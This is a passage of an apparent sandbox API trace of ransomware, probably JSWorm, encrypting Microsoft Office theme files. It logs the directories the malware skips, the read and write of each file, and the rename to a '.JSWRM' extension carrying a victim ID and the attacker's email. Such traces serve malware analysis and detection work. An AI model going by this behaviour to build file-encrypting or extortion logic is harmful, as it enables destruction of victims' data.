lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Aspect.xml", lpUsedDefaultChar=0x0) returned 10 [0100.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0100.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0100.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0100.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0100.449] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Aspect.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\aspect.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0100.450] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=740) returned 1 [0100.450] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2e0) returned 0x20b1f8 [0100.450] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x2e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x2e0, lpOverlapped=0x0) returned 1 [0100.474] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.474] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x2e0, lpOverlapped=0x0) returned 1 [0100.474] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0100.478] CloseHandle (hObject=0x314) returned 1 [0100.478] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0100.478] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0100.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0100.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0100.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0100.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0100.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0100.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0100.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.479] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Aspect.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\aspect.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Aspect.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\aspect.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0100.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0100.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0100.483] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x115da4b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x115da4b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x115da4b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e8, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Blue Green.xml", cAlternateFileName="BLUEGR~1.XML")) returned 1 [0100.484] lstrcmpiW (lpString1="Blue Green.xml", lpString2=".") returned 1 [0100.484] lstrcmpiW (lpString1="Blue Green.xml", lpString2="..") returned 1 [0100.484] lstrcmpiW (lpString1="Blue Green.xml", lpString2="...") returned 1 [0100.484] lstrcmpiW (lpString1="Blue Green.xml", lpString2="windows") returned -1 [0100.484] lstrcmpiW (lpString1="Blue Green.xml", lpString2="recovery") returned -1 [0100.484] lstrcmpiW (lpString1="Blue Green.xml", lpString2="perflogs") returned -1 [0100.484] lstrcmpiW (lpString1="Blue Green.xml", lpString2="documents and settings") returned -1 [0100.484] lstrcmpiW (lpString1="Blue Green.xml", lpString2="$RECYCLE.BIN") returned 1 [0100.484] lstrcmpiW (lpString1="Blue Green.xml", lpString2="system volume information") returned -1 [0100.484] lstrcmpiW (lpString1="Blue Green.xml", lpString2="msocache") returned -1 [0100.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0100.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Blue Green.xml", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Blue Green.xml", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Blue Green.xml", lpUsedDefaultChar=0x0) returned 14 [0100.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0100.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0100.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Blue Green.xml", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Blue Green.xml", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Blue Green.xml", lpUsedDefaultChar=0x0) returned 14 [0100.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0100.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0100.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0100.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0100.484] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Blue Green.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\blue green.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0100.485] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=744) returned 1 [0100.485] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2e0) returned 0x20b1f8 [0100.485] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x2e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x2e0, lpOverlapped=0x0) returned 1 [0100.487] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.487] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x2e0, lpOverlapped=0x0) returned 1 [0100.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0100.487] CloseHandle (hObject=0x314) returned 1 [0100.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0100.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0100.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0100.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0100.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f970 [0100.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0100.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.487] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Blue Green.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\blue green.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Blue Green.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\blue green.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0100.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0100.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0100.488] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1132ba98, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1132ba98, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1132ba98, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e5, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Blue II.xml", cAlternateFileName="BLUEII~1.XML")) returned 1 [0100.488] lstrcmpiW (lpString1="Blue II.xml", lpString2=".") returned 1 [0100.488] lstrcmpiW (lpString1="Blue II.xml", lpString2="..") returned 1 [0100.489] lstrcmpiW (lpString1="Blue II.xml", lpString2="...") returned 1 [0100.489] lstrcmpiW (lpString1="Blue II.xml", lpString2="windows") returned -1 [0100.489] lstrcmpiW (lpString1="Blue II.xml", lpString2="recovery") returned -1 [0100.489] lstrcmpiW (lpString1="Blue II.xml", lpString2="perflogs") returned -1 [0100.489] lstrcmpiW (lpString1="Blue II.xml", lpString2="documents and settings") returned -1 [0100.489] lstrcmpiW (lpString1="Blue II.xml", lpString2="$RECYCLE.BIN") returned 1 [0100.489] lstrcmpiW (lpString1="Blue II.xml", lpString2="system volume information") returned -1 [0100.489] lstrcmpiW (lpString1="Blue II.xml", lpString2="msocache") returned -1 [0100.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0100.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Blue II.xml", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Blue II.xml", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Blue II.xml", lpUsedDefaultChar=0x0) returned 11 [0100.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0100.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0100.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Blue II.xml", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Blue II.xml", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Blue II.xml", lpUsedDefaultChar=0x0) returned 11 [0100.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0100.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0100.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0100.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0100.489] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Blue II.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\blue ii.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0100.490] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=741) returned 1 [0100.490] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2e0) returned 0x20b1f8 [0100.490] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x2e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x2e0, lpOverlapped=0x0) returned 1 [0100.491] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.491] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x2e0, lpOverlapped=0x0) returned 1 [0100.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0100.492] CloseHandle (hObject=0x314) returned 1 [0100.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0100.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0100.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0100.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0100.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0100.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0100.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0100.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0100.492] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Blue II.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\blue ii.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Blue II.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\blue ii.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0100.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0100.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0100.493] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11377f40, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11377f40, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11377f40, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e7, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Blue Warm.xml", cAlternateFileName="BLUEWA~1.XML")) returned 1 [0100.493] lstrcmpiW (lpString1="Blue Warm.xml", lpString2=".") returned 1 [0100.493] lstrcmpiW (lpString1="Blue Warm.xml", lpString2="..") returned 1 [0100.493] lstrcmpiW (lpString1="Blue Warm.xml", lpString2="...") returned 1 [0100.493] lstrcmpiW (lpString1="Blue Warm.xml", lpString2="windows") returned -1 [0100.493] lstrcmpiW (lpString1="Blue Warm.xml", lpString2="recovery") returned -1 [0100.493] lstrcmpiW (lpString1="Blue Warm.xml", lpString2="perflogs") returned -1 [0100.493] lstrcmpiW (lpString1="Blue Warm.xml", lpString2="documents and settings") returned -1 [0100.493] lstrcmpiW (lpString1="Blue Warm.xml", lpString2="$RECYCLE.BIN") returned 1 [0100.493] lstrcmpiW (lpString1="Blue Warm.xml", lpString2="system volume information") returned -1 [0100.493] lstrcmpiW (lpString1="Blue Warm.xml", lpString2="msocache") returned -1 [0100.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0100.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Blue Warm.xml", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Blue Warm.xml", cchWideChar=13, lpMultiByteStr=0x345ebd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Blue Warm.xml", lpUsedDefaultChar=0x0) returned 13 [0100.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0100.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0100.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Blue Warm.xml", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Blue Warm.xml", cchWideChar=13, lpMultiByteStr=0x345eba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Blue Warm.xml", lpUsedDefaultChar=0x0) returned 13 [0100.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0100.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0100.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0100.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0100.494] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Blue Warm.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\blue warm.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0100.494] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=743) returned 1 [0100.494] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2e0) returned 0x20b1f8 [0100.494] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x2e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x2e0, lpOverlapped=0x0) returned 1 